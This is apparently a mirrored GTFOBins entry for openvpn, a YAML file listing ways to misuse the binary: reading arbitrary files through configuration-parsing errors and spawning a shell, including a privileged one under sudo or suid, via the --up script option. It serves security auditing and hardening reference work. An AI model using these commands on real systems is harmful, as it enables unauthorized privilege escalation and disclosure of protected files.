mirror of
https://github.com/GTFOBins/GTFOBins.github.io.git
synced 2026-03-07 22:46:19 +01:00
23 lines
513 B
Plaintext
23 lines
513 B
Plaintext
---
|
|
functions:
|
|
file-read:
|
|
- code: |-
|
|
openvpn --config /path/to/input-file
|
|
comment: |-
|
|
The file is actually parsed and the first partial wrong line is returned in an error message.
|
|
contexts:
|
|
sudo:
|
|
suid:
|
|
unprivileged:
|
|
shell:
|
|
- code: |-
|
|
openvpn --dev null --script-security 2 --up '/bin/sh -s'
|
|
contexts:
|
|
sudo:
|
|
suid:
|
|
code: |-
|
|
openvpn --dev null --script-security 2 --up '/bin/sh -p -s'
|
|
shell: false
|
|
unprivileged:
|
|
...
|